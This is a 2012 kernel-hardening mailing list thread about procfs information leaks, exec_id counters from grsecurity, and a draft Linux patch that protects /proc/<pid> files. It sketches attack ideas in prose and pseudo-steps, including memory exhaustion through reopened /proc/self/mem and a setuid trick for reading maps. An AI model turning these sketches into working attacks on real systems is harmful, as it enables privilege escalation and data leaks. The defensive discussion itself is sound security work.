What I can say ? ... impressive ;)

> Alexander

[1] http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commitdiff;h=6d08f2c7139790c268820a2e590795cb8333181a

-- 
tixxdz
http://opendz.org

^ permalink raw reply	[flat|nested] 16+ messages in thread

* Re: [kernel-hardening] procfs: infoleaks and DAC permissions
  2012-02-12 15:36   ` Djalal Harouni
@ 2012-02-13 15:50     ` Djalal Harouni
  0 siblings, 0 replies; 16+ messages in thread
From: Djalal Harouni @ 2012-02-13 15:50 UTC (permalink / raw)
  To: kernel-hardening; +Cc: Jason A. Donenfeld

On Sun, Feb 12, 2012 at 04:36:12PM +0100, Djalal Harouni wrote:
> On Sat, Feb 11, 2012 at 02:07:09PM +0400, Solar Designer wrote:
> > On Fri, Feb 10, 2012 at 03:06:58AM +0100, Djalal Harouni wrote:
> > > 1) Infoleaks via self-read by a suid/guid:
> > ...
> > >    I believe to fix this we should just let 'mm_struct' point to the old
> > >    one (as done by Linus' commit [2] for the /proc/self/mem)
> > 
> > I dislike this approach because it introduces a resource limits bypass.
> > When you hold an mm, you hold all data of the old process in VM, right?
> I guess, but that code can be considered semantically correct since we did
> not release it.
> 
> Oleg's patch [1] makes sure that 'mm->mm_users' holds the right value, if
> the process drops the 'fd' the next read/write call will fail, so it will
> not be visible to userspace if the original process exits. It will fail
> at:
> if (!atomic_inc_not_zero(&mm->mm_users))
>   return NULL;
> 
> It will be freed only by the release function.
> 
> 
> Can you elaborate more on the resource limits bypass please ?
> 
> 
> I guess we can try this:
> self_pid = getpid()
> open("/proc/self_pid/mem")
> execv("/proc/self_pid/comm",...)
> 
> A quick slabtop shows that mm_struct objects keep increasing...
> But the 'fd' limit will kill the program, what about others ?
> 
Ok it seems that mm_struct can explode, thanks to the VFS:
/proc/sys/fs/file-max  (34869 on the tested system)
This will catch it...


Executing NR programs that keep /proc/self/mem open and re-exec or
whatever can show this behaviour:

slabtop:
OBJS   ACTIVE  USE OBJ SIZE  SLABS OBJ/SLAB CACHE SIZE NAME
186585 186410  99%    0.38K   8885       21     71080K kmemleak_object
...
 34233  31414  91%    1.25K   2858       12     45728K mm_struct
 34944  32062  91%    0.38K   1664       21     13312K filp
 44835  41973  93%    0.19K   2135       21      8540K kmalloc-192
...
   294    163  55%    4.88K     49        6      1568K task_struct

See: task_struct.


Hope this will help. Someone who knows this, can tell more.

Thanks.

-- 
tixxdz
http://opendz.org

^ permalink raw reply	[flat|nested] 16+ messages in thread

* Re: [kernel-hardening] procfs: infoleaks and DAC permissions
  2012-02-10 14:36 ` Vasiliy Kulikov
  2012-02-11  9:20   ` Solar Designer
  2012-02-12  0:19   ` Djalal Harouni
@ 2012-02-21 14:56   ` Solar Designer
  2012-02-21 16:25     ` Djalal Harouni
  2012-02-24  0:56     ` Solar Designer
  2012-02-21 16:34   ` Djalal Harouni
  3 siblings, 2 replies; 16+ messages in thread
From: Solar Designer @ 2012-02-21 14:56 UTC (permalink / raw)
  To: kernel-hardening; +Cc: Brad Spengler

On Fri, Feb 10, 2012 at 06:36:17PM +0400, Vasiliy Kulikov wrote:
> [1] http://grsecurity.net/~spender/dev_patches/distros_should_sponsor_me_for_doing_their_jobs.patch

In order to provide its security, this relies on atomic64_t actually
being 64-bit and on atomic64_inc_return() returning a 64-bit value - but
one or both of these requirements appear to be violated for some archs.

In fact, per a quick grep it appears that atomic64_inc_return() exists
for a subset of the archs only.

The patch still looks OK to apply for distros that only care about a
handful of archs, where this is fully 64-bit.  Correct?

Are there any other known issues with this patch (or approach)?

A newer revision of it maybe (e.g. what's merged in grsecurity patch)?
I am just guessing.

Should there be a different revision of the patch for mainline?  Perhaps
it'd have to use a spinlock at least on archs lacking 64-bit atomics.

Alexander

^ permalink raw reply	[flat|nested] 16+ messages in thread

* Re: [kernel-hardening] procfs: infoleaks and DAC permissions
  2012-02-21 14:56   ` Solar Designer
@ 2012-02-21 16:25     ` Djalal Harouni
  2012-02-21 17:42       ` Solar Designer
  2012-02-24  0:56     ` Solar Designer
  1 sibling, 1 reply; 16+ messages in thread
From: Djalal Harouni @ 2012-02-21 16:25 UTC (permalink / raw)
  To: kernel-hardening; +Cc: Brad Spengler, Solar Designer

On Tue, Feb 21, 2012 at 06:56:53PM +0400, Solar Designer wrote:
> On Fri, Feb 10, 2012 at 06:36:17PM +0400, Vasiliy Kulikov wrote:
> > [1] http://grsecurity.net/~spender/dev_patches/distros_should_sponsor_me_for_doing_their_jobs.patch
> 
> In order to provide its security, this relies on atomic64_t actually
> being 64-bit and on atomic64_inc_return() returning a 64-bit value - but
> one or both of these requirements appear to be violated for some archs.
> 
> In fact, per a quick grep it appears that atomic64_inc_return() exists
> for a subset of the archs only.
There is the GENERIC_ATOMIC64 config option that can be used to support
atomic64_t.

[...]
> Should there be a different revision of the patch for mainline?  Perhaps
> it'd have to use a spinlock at least on archs lacking 64-bit atomics.
I want to add that atomic64_t is already used in other places:
xfs log functions, perf counters, netfilter conntrack modules...

That generic solution is already using raw spinlocks, but with a static
hashed array, which is perhaps not perfect for a machine with a lot of
CPUs ?


BTW I'm still trying to work on these issues, and the global exec_id from
spender's patch is the best solution, since it can be used as a global
counter to track objects related to process/mm... as noted by Vasiliy
in his other email.

Out of context: from the git commit history we can see that there have been
lately a lot of changes to /proc/<pid>/* logic which is related to this
sort of vulns.  I'm trying to summarize them before sending more patches,
just to avoid new problems.

Thanks.

-- 
tixxdz
http://opendz.org

^ permalink raw reply	[flat|nested] 16+ messages in thread

* Re: [kernel-hardening] procfs: infoleaks and DAC permissions
  2012-02-10 14:36 ` Vasiliy Kulikov
                     ` (2 preceding siblings ...)
  2012-02-21 14:56   ` Solar Designer
@ 2012-02-21 16:34   ` Djalal Harouni
  3 siblings, 0 replies; 16+ messages in thread
From: Djalal Harouni @ 2012-02-21 16:34 UTC (permalink / raw)
  To: kernel-hardening; +Cc: Kees Cook, Jason A. Donenfeld, Solar Designer

On Fri, Feb 10, 2012 at 06:36:17PM +0400, Vasiliy Kulikov wrote:
> On Fri, Feb 10, 2012 at 03:06 +0100, Djalal Harouni wrote:
> > A partial fix for this (2):
> > Procfs 'hidepid=' mount option which can be used to restrict access to
> > arbitrary /proc/<pid>/ files, Vasiliy commit [3], congrats.
> > But if the procfs 'gid=' mount option is used then it can give permissions
> > back to read these files if the user is part of the 'gid' group. IOW this
> > will just restore the previous vulnerable situation.
> 
> It is even weaker - you could trick setuid $SPID to open /proc/$PID/maps,
> do exec(setuid_app) as $PID and read setuid_app's maps as $SPID.
Just want to say that I got your point:

I was refering to (2), but your response about 'hidepid' and how to play
with it is more related to (1) setuid self-read and keeping fd opened. The
(ugly) patch I sent will block it.

Spender's patch will do the job.

Note: that trick can give an extra lseek() to the attacker on
/proc/$PID/maps... that will be reflected on the executed setuid_app.


-- 
tixxdz
http://opendz.org

^ permalink raw reply	[flat|nested] 16+ messages in thread

* Re: [kernel-hardening] procfs: infoleaks and DAC permissions
  2012-02-21 16:25     ` Djalal Harouni
@ 2012-02-21 17:42       ` Solar Designer
  0 siblings, 0 replies; 16+ messages in thread
From: Solar Designer @ 2012-02-21 17:42 UTC (permalink / raw)
  To: kernel-hardening; +Cc: Brad Spengler

On Tue, Feb 21, 2012 at 05:25:58PM +0100, Djalal Harouni wrote:
> On Tue, Feb 21, 2012 at 06:56:53PM +0400, Solar Designer wrote:
> > On Fri, Feb 10, 2012 at 06:36:17PM +0400, Vasiliy Kulikov wrote:
> > > [1] http://grsecurity.net/~spender/dev_patches/distros_should_sponsor_me_for_doing_their_jobs.patch
> > 
> > In order to provide its security, this relies on atomic64_t actually
> > being 64-bit and on atomic64_inc_return() returning a 64-bit value - but
> > one or both of these requirements appear to be violated for some archs.
> > 
> > In fact, per a quick grep it appears that atomic64_inc_return() exists
> > for a subset of the archs only.
> There is the GENERIC_ATOMIC64 config option that can be used to support
> atomic64_t.

Oh, I thought I could have missed something like this.  I now see that
this option is actually being forced for proper archs, such as 32-bit
PowerPC.  That's good news.

	select GENERIC_ATOMIC64 if PPC32

> I want to add that atomic64_t is already used in other places:
> xfs log functions, perf counters, netfilter conntrack modules...
> 
> That generic solution is already using raw spinlocks, but with a static
> hashed array, which is perhaps not perfect for a machine with a lot of
> CPUs ?

This is what the comment in lib/atomic64.c says, but perhaps machines
with a large number of CPUs actually have native 64-bit atomics.  For
example, if we consider PowerPC, the large machines are surely 64-bit.

OK, it looks like Brad's approach may be used as-is.

Alexander

^ permalink raw reply	[flat|nested] 16+ messages in thread

* Re: [kernel-hardening] procfs: infoleaks and DAC permissions
  2012-02-21 14:56   ` Solar Designer
  2012-02-21 16:25     ` Djalal Harouni
@ 2012-02-24  0:56     ` Solar Designer
  2012-02-25  3:56       ` Solar Designer
  1 sibling, 1 reply; 16+ messages in thread
From: Solar Designer @ 2012-02-24  0:56 UTC (permalink / raw)
  To: kernel-hardening; +Cc: Brad Spengler

Brad, all -

On Tue, Feb 21, 2012 at 06:56:53PM +0400, Solar Designer wrote:
> On Fri, Feb 10, 2012 at 06:36:17PM +0400, Vasiliy Kulikov wrote:
> > [1] http://grsecurity.net/~spender/dev_patches/distros_should_sponsor_me_for_doing_their_jobs.patch
...
> Are there any other known issues with this patch (or approach)?
> 
> A newer revision of it maybe (e.g. what's merged in grsecurity patch)?
> I am just guessing.

I've just reviewed revisions of this patch as included in
grsecurity-2.2.2-2.6.32.57-201202200919.patch and
grsecurity-2.2.2-3.2.7-201202202005.patch.  Here are a few observations:

1. The grsecurity patch for 2.6.32.x appears to need the counter
increment introduced into fs/compat.c: compat_do_execve().  It is
currently missing that, so I guess the protection is bypassable on
64-bit kernels with 32-bit syscall wrappers present (only if the system
also has a suitable 32-bit SUID/SGID/fscaps-enabled binary).

2. /proc/<pid>/mem appears to be excluded from this protection - any
special reason why?  I expected it to be one of the primary targets of
this protection.

3. These grsecurity patch revisions actually include a newer revision of
distros_should_sponsor_me_for_doing_their_jobs.patch.  Notably, copying
of exec_id has been added to kernel/fork.c: copy_process().  I wonder
why such explicit copying was needed and whether it is possibly a no-op
given that this same function does:

	p = dup_task_struct(current);

which appears to boil down to:

int __attribute__((weak)) arch_dup_task_struct(struct task_struct *dst,
                                               struct task_struct *src)
{
	*dst = *src;
	return 0;
}

OK, that's a weak alias, so perhaps some archs override it and somehow
don't copy that added field?  This doesn't appear to be the case in
2.6.32.57 (the alias is only overridden for x86, and it does full
copying like above), but maybe it might differ in other versions,
although it'd sound weird if arch_dup_task_struct() didn't copy the
entire struct.

Is this just a better safe than sorry type of thing?  I'm OK with that
if so.

Another change is "long long" to "u64" for the exec_id fields.  I suppose
it's not atomic64_t in order to avoid unnecessarily bringing in volatile.
Looks OK to me.

4. In grsecurity-2.2.2-3.2.7-201202202005.patch, it may be cleaner to
declare global_exec_counter static.  (In the patch for 2.6.32.x, the
counter will also need to be accessed from fs/compat.c, I think.)

As I think is normal for code reviews, I fully expect some or all of the
questions/suggestions above to be dumb. ;-)

I'd appreciate any comments.

Thanks,

Alexander

^ permalink raw reply	[flat|nested] 16+ messages in thread

* Re: [kernel-hardening] procfs: infoleaks and DAC permissions
  2012-02-24  0:56     ` Solar Designer
@ 2012-02-25  3:56       ` Solar Designer
  2012-03-03  0:35         ` Djalal Harouni
  0 siblings, 1 reply; 16+ messages in thread
From: Solar Designer @ 2012-02-25  3:56 UTC (permalink / raw)
  To: kernel-hardening; +Cc: Brad Spengler

On Fri, Feb 24, 2012 at 04:56:13AM +0400, Solar Designer wrote:
> 1. The grsecurity patch for 2.6.32.x appears to need the counter
> increment introduced into fs/compat.c: compat_do_execve().  It is
> currently missing that, so I guess the protection is bypassable on
> 64-bit kernels with 32-bit syscall wrappers present (only if the system
> also has a suitable 32-bit SUID/SGID/fscaps-enabled binary).

Fixed in grsecurity-2.9-2.6.32.57-201202242017.patch.

> 2. /proc/<pid>/mem appears to be excluded from this protection - any
> special reason why?  I expected it to be one of the primary targets of
> this protection.

OK, my guess is that this is because mem_read() uses struct file,
whereas the exec_id field is currently only implemented for seq_file.

Instead, grsecurity's mem_read() currently has:

+	// XXX: temporary workaround
+	if (!task_dumpable(task) && task == current) {
+		ret = -EACCES;
+		goto out;
+	}

> 3. These grsecurity patch revisions actually include a newer revision of
> distros_should_sponsor_me_for_doing_their_jobs.patch.  Notably, copying
> of exec_id has been added to kernel/fork.c: copy_process().  I wonder
> why such explicit copying was needed and whether it is possibly a no-op
> given that this same function does:
> 
> 	p = dup_task_struct(current);

The explicit copying of exec_id is dropped in
grsecurity-2.9-2.6.32.57-201202242017.patch.

> I'd appreciate any comments.

Got no comments, but the code changes suffice. ;-)

I am now getting some of this stuff into the RHEL5'ish kernels that we
use on Owl.

Thanks,

Alexander

^ permalink raw reply	[flat|nested] 16+ messages in thread

* Re: [kernel-hardening] procfs: infoleaks and DAC permissions
  2012-02-25  3:56       ` Solar Designer
@ 2012-03-03  0:35         ` Djalal Harouni
  0 siblings, 0 replies; 16+ messages in thread
From: Djalal Harouni @ 2012-03-03  0:35 UTC (permalink / raw)
  To: kernel-hardening; +Cc: Brad Spengler, Solar Designer

Hi,

On Sat, Feb 25, 2012 at 07:56:53AM +0400, Solar Designer wrote:
> I am now getting some of this stuff into the RHEL5'ish kernels that we
> use on Owl.
Based on Brad's exec_id I've added (converted) some private structures
which can be used now to protect all the /proc/pid/ files. The patch is
bellow (not finished, the idea is there, just use it for the appropriate
files or all of them ?), this is the cost of protecting the files without
changing their internal logic.


Currently:
Info files (INF) /proc/pid/{hardwall,io,auxv,limits,syscall...} are all
protected by a one hit just before returning results to userspace.

ONE files /proc/pid/{syscall,stack,...} are also protected, every handler
implements its own check as in grsecurity. Please note that we can also
have a single check for all these files, I did not do that since I still
have some concerns (not sure) which perhaps I'll discuss on lkml.

REG files should implement their checks, BTW the
/proc/<pid>/{environ,pagemap} in the attached patch implement the two
protections:
1) self-read protection.
2) DAC bypass protection: the files are 0400 and the PTRACE_MODE_READ is
   checked at open() and read(). open() also need the PTRACE check to
   avoid any other capability bypass which can be allowed by the VFS.

This solution should also be applied to the other files which can leak
sensitive information, and if every thing is ok then /proc/<pid>/mem should
do the same, except for /proc/pid/maps which will break glibc, the
solution for /proc/pid/maps was already given by Vasiliy in the other
thread: 0444 mode and check at open():

if (current != task && !ptrace_may_access(task, PTRACE_MODE_READ))
        return -EACCES;

We may add here:
  if (current->mm == task->mm) then allow

In case both share the same mm, or just do the check with mm_for_maps() or
mm_access().

I must say that even this can't be fully trusted since creds of
current/target may change at any time, and even setuid can't trust its own
/proc/self files. The correct check should be done before returning to
userpsace as it was noted in this 2003/2004 thread [1], BTW you can find
on this 2003 old thread how to exploit this 2011/2012 /proc/self/mem
vulnerability :-)


For the DIR entries I did not have enough time to check them.


I want to add that hopefully the saved exec_id is the id of current
which is an aggressive behaviour. This will protect procfs info files
like the '/proc/pid/auxv' file when it's opened by a CAP_DAC_OVERRIDE
process... and passed to a CAP_SYS_PTRACE process (setuid) since the info
files do not implement the open() operation, so no ptrace checks... seems
like with CAP_DAC_OVERRIDE we can get CAP_SYS_PTRACE...

The patch below adds an open() operation but just to setup the exec_id,
adding the ptrace check will break the info files, unless we change the
logic of 'auxv' and others sensitive files to be a REG file.

I'm mentioning this since the current logic of /proc/self/mem is to attach
and reference the target, which can also be emulated by setting the
exec_id to the target's id ... but in that case we also need proper perms
checks at open(), read() ...


I'll clean the patch, split it and try to submit the series soon.
And sorry for my late response (homeworks done :) and just got some time).

Thanks.

[1] http://lkml.indiana.edu/hypermail/linux/kernel/0407.0/1314.html


procfs: protections for /proc/pid/* files
The exec_id idea was taken from the latest grsecurity patches:
grsecurity-2.9-3.2.8-201202272117.patch

Signed-off-by: Djalal Harouni <tixxdz@opendz.org>
---

diff --git a/fs/exec.c b/fs/exec.c
index 92ce83a..42c3fff 100644
--- a/fs/exec.c
+++ b/fs/exec.c
@@ -1448,6 +1448,14 @@ int search_binary_handler(struct linux_binprm *bprm,struct pt_regs *regs)
 EXPORT_SYMBOL(search_binary_handler);
 
 /*
+ * A global execve counter that we need to set atomically.
+ * It will be incremented on every do_execve_common() this way we can use
+ * it to check if some special objects belong to the appropriate process
+ * image.
+ */
+static atomic64_t exec_counter = ATOMIC_INIT(0);
+
+/*
  * sys_execve() executes a new program.
  */
 static int do_execve_common(const char *filename,
@@ -1542,6 +1550,7 @@ static int do_execve_common(const char *filename,
 		goto out;
 
 	/* execve succeeded */
+	current->exec_id = atomic64_inc_return(&exec_counter);
 	current->fs->in_exec = 0;
 	current->in_execve = 0;
 	acct_update_integrals(current);
diff --git a/fs/proc/array.c b/fs/proc/array.c
index c602b8d..e861cb2 100644
--- a/fs/proc/array.c
+++ b/fs/proc/array.c
@@ -340,8 +340,12 @@ static void task_cpus_allowed(struct seq_file *m, struct task_struct *task)
 int proc_pid_status(struct seq_file *m, struct pid_namespace *ns,
 			struct pid *pid, struct task_struct *task)
 {
-	struct mm_struct *mm = get_task_mm(task);
+	struct mm_struct *mm;
+
+	if (!proc_exec_id_ok(current, m->private))
+		return 0;
 
+	mm = get_task_mm(task);
 	task_name(m, task);
 	task_state(m, ns, pid, task);
 
@@ -378,6 +382,9 @@ static int do_task_stat(struct seq_file *m, struct pid_namespace *ns,
 	char tcomm[sizeof(task->comm)];
 	unsigned long flags;
 
+	if (!proc_exec_id_ok(current, m->private))
+		return 0;
+
 	state = *get_task_state(task);
 	vsize = eip = esp = 0;
 	permitted = ptrace_may_access(task, PTRACE_MODE_READ | PTRACE_MODE_NOAUDIT);
@@ -536,8 +543,12 @@ int proc_pid_statm(struct seq_file *m, struct pid_namespace *ns,
 			struct pid *pid, struct task_struct *task)
 {
 	unsigned long size = 0, resident = 0, shared = 0, text = 0, data = 0;
-	struct mm_struct *mm = get_task_mm(task);
+	struct mm_struct *mm;
+
+	if (!proc_exec_id_ok(current, m->private))
+		return 0;
 
+	mm = get_task_mm(task);
 	if (mm) {
 		size = task_statm(mm, &shared, &text, &data, &resident);
 		mmput(mm);
diff --git a/fs/proc/base.c b/fs/proc/base.c
index d4548dd..f68f7fc 100644
--- a/fs/proc/base.c
+++ b/fs/proc/base.c
@@ -288,7 +288,7 @@ static int lock_trace(struct task_struct *task)
 		return err;
 	if (!ptrace_may_access(task, PTRACE_MODE_ATTACH)) {
 		mutex_unlock(&task->signal->cred_guard_mutex);
-		return -EPERM;
+		return -EACCES;
 	}
 	return 0;
 }
@@ -305,6 +305,7 @@ static void unlock_trace(struct task_struct *task)
 static int proc_pid_stack(struct seq_file *m, struct pid_namespace *ns,
 			  struct pid *pid, struct task_struct *task)
 {
+	struct proc_file_private *priv = m->private;
 	struct stack_trace trace;
 	unsigned long *entries;
 	int err;
@@ -320,17 +321,24 @@ static int proc_pid_stack(struct seq_file *m, struct pid_namespace *ns,
 	trace.skip		= 0;
 
 	err = lock_trace(task);
-	if (!err) {
-		save_stack_trace_tsk(task, &trace);
+	if (err)
+		goto free;
 
-		for (i = 0; i < trace.nr_entries; i++) {
-			seq_printf(m, "[<%pK>] %pS\n",
-				   (void *)entries[i], (void *)entries[i]);
-		}
-		unlock_trace(task);
+	err = 0;
+	if (!proc_exec_id_ok(current, priv))
+		goto unlock;
+
+	save_stack_trace_tsk(task, &trace);
+
+	for (i = 0; i < trace.nr_entries; i++) {
+		seq_printf(m, "[<%pK>] %pS\n",
+			   (void *)entries[i], (void *)entries[i]);
 	}
-	kfree(entries);
 
+unlock:
+	unlock_trace(task);
+free:
+	kfree(entries);
 	return err;
 }
 #endif
@@ -610,15 +618,35 @@ static const struct inode_operations proc_def_inode_operations = {
 
 #define PROC_BLOCK_SIZE	(3*1024)		/* 4K page size but our output routines use some slack for overruns */
 
+static int proc_info_open(struct inode *inode, struct file *filp)
+{
+	struct proc_file_private *priv;
+	int ret = -ENOMEM;
+
+	priv = kzalloc(sizeof(*priv), GFP_KERNEL);
+	if (!priv)
+		return ret;
+
+	priv->exec_id = current->exec_id;
+	filp->private_data = priv;
+
+	return 0;
+}
+
 static ssize_t proc_info_read(struct file * file, char __user * buf,
 			  size_t count, loff_t *ppos)
 {
 	struct inode * inode = file->f_path.dentry->d_inode;
+	struct proc_file_private *priv = file->private_data;
 	unsigned long page;
-	ssize_t length;
-	struct task_struct *task = get_proc_task(inode);
+	ssize_t length = 0;
+	struct task_struct *task;
+
+	if (!priv)
+		return length;
 
 	length = -ESRCH;
+	task = get_proc_task(inode);
 	if (!task)
 		goto out_no_task;
 
@@ -631,8 +659,16 @@ static ssize_t proc_info_read(struct file * file, char __user * buf,
 
 	length = PROC_I(inode)->op.proc_read(task, (char*)page);
 
+	/* Check delayed */
+	if (!proc_exec_id_ok(current, priv)) {
+		length = 0;
+		goto out_free;
+	}
+
 	if (length >= 0)
 		length = simple_read_from_buffer(buf, count, ppos, (char *)page, length);
+
+out_free:
 	free_page(page);
 out:
 	put_task_struct(task);
@@ -640,14 +676,25 @@ out_no_task:
 	return length;
 }
 
+static int proc_info_release(struct inode *inode, struct file *filp)
+{
+	struct proc_file_private *priv = filp->private_data;
+
+	kfree(priv);
+	return 0;
+}
+
 static const struct file_operations proc_info_file_operations = {
+	.open		= proc_info_open,
 	.read		= proc_info_read,
 	.llseek		= generic_file_llseek,
+	.release	= proc_info_release,
 };
 
 static int proc_single_show(struct seq_file *m, void *v)
 {
-	struct inode *inode = m->private;
+	struct proc_file_private *priv = m->private;
+	struct inode *inode = priv->inode;
 	struct pid_namespace *ns;
 	struct pid *pid;
 	struct task_struct *task;
@@ -667,14 +714,36 @@ static int proc_single_show(struct seq_file *m, void *v)
 
 static int proc_single_open(struct inode *inode, struct file *filp)
 {
-	return single_open(filp, proc_single_show, inode);
+	struct proc_file_private *priv;
+	int ret = -ENOMEM;
+	priv = kzalloc(sizeof(*priv), GFP_KERNEL);
+	if (priv) {
+		priv->exec_id = current->exec_id;
+		ret = single_open(filp, proc_single_show, priv);
+		if (!ret)
+			priv->inode = inode;
+		else
+			kfree(priv);
+	}
+	return ret;
+}
+
+static int proc_single_release(struct inode *inode, struct file *filp)
+{
+	struct seq_file *seq = filp->private_data;
+	int ret = 0;
+	if (seq) {
+		kfree(seq->private);
+		ret = single_release(inode, filp);
+	}
+	return ret;
 }
 
 static const struct file_operations proc_single_file_operations = {
 	.open		= proc_single_open,
 	.read		= seq_read,
 	.llseek		= seq_lseek,
-	.release	= single_release,
+	.release	= proc_single_release,
 };
 
 static int mem_open(struct inode* inode, struct file* file)
@@ -801,15 +870,62 @@ static const struct file_operations proc_mem_operations = {
 	.release	= mem_release,
 };
 
+static int environ_open(struct inode *inode, struct file *filp)
+{
+	struct proc_file_private *priv;
+	struct mm_struct *mm;
+	struct task_struct *task;
+	int ret = -ENOMEM;
+
+	priv = kzalloc(sizeof(*priv), GFP_KERNEL);
+	if (!priv)
+		return ret;
+
+	ret = -ESRCH;
+	task = get_proc_task(filp->f_path.dentry->d_inode);
+	if (!task)
+		goto out_free;
+
+	priv->exec_id = current->exec_id;
+	mm = mm_for_maps(task);
+	put_task_struct(task);
+
+	if (!mm) {
+		ret = -ENOENT;
+		goto out_free;
+	}
+
+	if (IS_ERR(mm)) {
+		ret = PTR_ERR(mm);
+		goto out_free;
+	}
+
+	filp->private_data = priv;
+	/* do not pin mm */
+	mmput(mm);
+
+	return 0;
+
+out_free:
+	kfree(priv);
+	return ret;
+}
+
 static ssize_t environ_read(struct file *file, char __user *buf,
 			size_t count, loff_t *ppos)
 {
-	struct task_struct *task = get_proc_task(file->f_dentry->d_inode);
+	struct proc_file_private *priv = file->private_data;
+	struct task_struct *task;
 	char *page;
 	unsigned long src = *ppos;
-	int ret = -ESRCH;
+	int ret = 0;
 	struct mm_struct *mm;
 
+	if (!priv)
+		return ret;
+
+	ret = -ESRCH;
+	task = get_proc_task(file->f_dentry->d_inode);
 	if (!task)
 		goto out_no_task;
 
@@ -820,11 +936,21 @@ static ssize_t environ_read(struct file *file, char __user *buf,
 
 
 	mm = mm_for_maps(task);
-	ret = PTR_ERR(mm);
-	if (!mm || IS_ERR(mm))
+
+	if (!mm) {
+		ret = -ENOENT;
 		goto out_free;
+	}
+
+	if (IS_ERR(mm)) {
+		ret = PTR_ERR(mm);
+		goto out_free;
+	}
 
 	ret = 0;
+	if (!proc_exec_id_ok(current, priv))
+		goto out_mm;
+
 	while (count > 0) {
 		int this_len, retval, max_len;
 
@@ -856,6 +982,7 @@ static ssize_t environ_read(struct file *file, char __user *buf,
 	}
 	*ppos = src;
 
+out_mm:
 	mmput(mm);
 out_free:
 	free_page((unsigned long) page);
@@ -865,9 +992,19 @@ out_no_task:
 	return ret;
 }
 
+static int environ_release(struct inode *inode, struct file *filp)
+{
+	struct proc_file_private *priv = filp->private_data;
+
+	kfree(priv);
+	return 0;
+}
+
 static const struct file_operations proc_environ_operations = {
+	.open		= environ_open,
 	.read		= environ_read,
 	.llseek		= generic_file_llseek,
+	.release	= environ_release,
 };
 
 static ssize_t oom_adjust_read(struct file *file, char __user *buf,
@@ -2948,10 +3085,14 @@ static int proc_pid_personality(struct seq_file *m, struct pid_namespace *ns,
 				struct pid *pid, struct task_struct *task)
 {
 	int err = lock_trace(task);
-	if (!err) {
+	if (err)
+		return err;
+
+	err = 0;
+	if (proc_exec_id_ok(current, m->private))
 		seq_printf(m, "%08x\n", task->personality);
-		unlock_trace(task);
-	}
+
+	unlock_trace(task);
 	return err;
 }
 
@@ -2975,7 +3116,7 @@ static const struct pid_entry tgid_base_stuff[] = {
 	REG("environ",    S_IRUSR, proc_environ_operations),
 	INF("auxv",       S_IRUSR, proc_pid_auxv),
 	ONE("status",     S_IRUGO, proc_pid_status),
-	ONE("personality", S_IRUGO, proc_pid_personality),
+	ONE("personality", S_IRUSR, proc_pid_personality),
 	INF("limits",	  S_IRUGO, proc_pid_limits),
 #ifdef CONFIG_SCHED_DEBUG
 	REG("sched",      S_IRUGO|S_IWUSR, proc_pid_sched_operations),
@@ -2985,14 +3126,14 @@ static const struct pid_entry tgid_base_stuff[] = {
 #endif
 	REG("comm",      S_IRUGO|S_IWUSR, proc_pid_set_comm_operations),
 #ifdef CONFIG_HAVE_ARCH_TRACEHOOK
-	INF("syscall",    S_IRUGO, proc_pid_syscall),
+	INF("syscall",    S_IRUSR, proc_pid_syscall),
 #endif
 	INF("cmdline",    S_IRUGO, proc_pid_cmdline),
 	ONE("stat",       S_IRUGO, proc_tgid_stat),
 	ONE("statm",      S_IRUGO, proc_pid_statm),
 	REG("maps",       S_IRUGO, proc_maps_operations),
 #ifdef CONFIG_NUMA
-	REG("numa_maps",  S_IRUGO, proc_numa_maps_operations),
+	REG("numa_maps",  S_IRUSR, proc_numa_maps_operations),
 #endif
 	REG("mem",        S_IRUSR|S_IWUSR, proc_mem_operations),
 	LNK("cwd",        proc_cwd_link),
@@ -3003,8 +3144,8 @@ static const struct pid_entry tgid_base_stuff[] = {
 	REG("mountstats", S_IRUSR, proc_mountstats_operations),
 #ifdef CONFIG_PROC_PAGE_MONITOR
 	REG("clear_refs", S_IWUSR, proc_clear_refs_operations),
-	REG("smaps",      S_IRUGO, proc_smaps_operations),
-	REG("pagemap",    S_IRUGO, proc_pagemap_operations),
+	REG("smaps",      S_IRUSR, proc_smaps_operations),
+	REG("pagemap",    S_IRUSR, proc_pagemap_operations),
 #endif
 #ifdef CONFIG_SECURITY
 	DIR("attr",       S_IRUGO|S_IXUGO, proc_attr_dir_inode_operations, proc_attr_dir_operations),
@@ -3013,7 +3154,7 @@ static const struct pid_entry tgid_base_stuff[] = {
 	INF("wchan",      S_IRUGO, proc_pid_wchan),
 #endif
 #ifdef CONFIG_STACKTRACE
-	ONE("stack",      S_IRUGO, proc_pid_stack),
+	ONE("stack",      S_IRUSR, proc_pid_stack),
 #endif
 #ifdef CONFIG_SCHEDSTATS
 	INF("schedstat",  S_IRUGO, proc_pid_schedstat),
@@ -3337,21 +3478,21 @@ static const struct pid_entry tid_base_stuff[] = {
 	REG("environ",   S_IRUSR, proc_environ_operations),
 	INF("auxv",      S_IRUSR, proc_pid_auxv),
 	ONE("status",    S_IRUGO, proc_pid_status),
-	ONE("personality", S_IRUGO, proc_pid_personality),
+	ONE("personality", S_IRUSR, proc_pid_personality),
 	INF("limits",	 S_IRUGO, proc_pid_limits),
 #ifdef CONFIG_SCHED_DEBUG
 	REG("sched",     S_IRUGO|S_IWUSR, proc_pid_sched_operations),
 #endif
 	REG("comm",      S_IRUGO|S_IWUSR, proc_pid_set_comm_operations),
 #ifdef CONFIG_HAVE_ARCH_TRACEHOOK
-	INF("syscall",   S_IRUGO, proc_pid_syscall),
+	INF("syscall",   S_IRUSR, proc_pid_syscall),
 #endif
 	INF("cmdline",   S_IRUGO, proc_pid_cmdline),
 	ONE("stat",      S_IRUGO, proc_tid_stat),
 	ONE("statm",     S_IRUGO, proc_pid_statm),
 	REG("maps",      S_IRUGO, proc_maps_operations),
 #ifdef CONFIG_NUMA
-	REG("numa_maps", S_IRUGO, proc_numa_maps_operations),
+	REG("numa_maps", S_IRUSR, proc_numa_maps_operations),
 #endif
 	REG("mem",       S_IRUSR|S_IWUSR, proc_mem_operations),
 	LNK("cwd",       proc_cwd_link),
@@ -3361,8 +3502,8 @@ static const struct pid_entry tid_base_stuff[] = {
 	REG("mountinfo",  S_IRUGO, proc_mountinfo_operations),
 #ifdef CONFIG_PROC_PAGE_MONITOR
 	REG("clear_refs", S_IWUSR, proc_clear_refs_operations),
-	REG("smaps",     S_IRUGO, proc_smaps_operations),
-	REG("pagemap",    S_IRUGO, proc_pagemap_operations),
+	REG("smaps",     S_IRUSR, proc_smaps_operations),
+	REG("pagemap",    S_IRUSR, proc_pagemap_operations),
 #endif
 #ifdef CONFIG_SECURITY
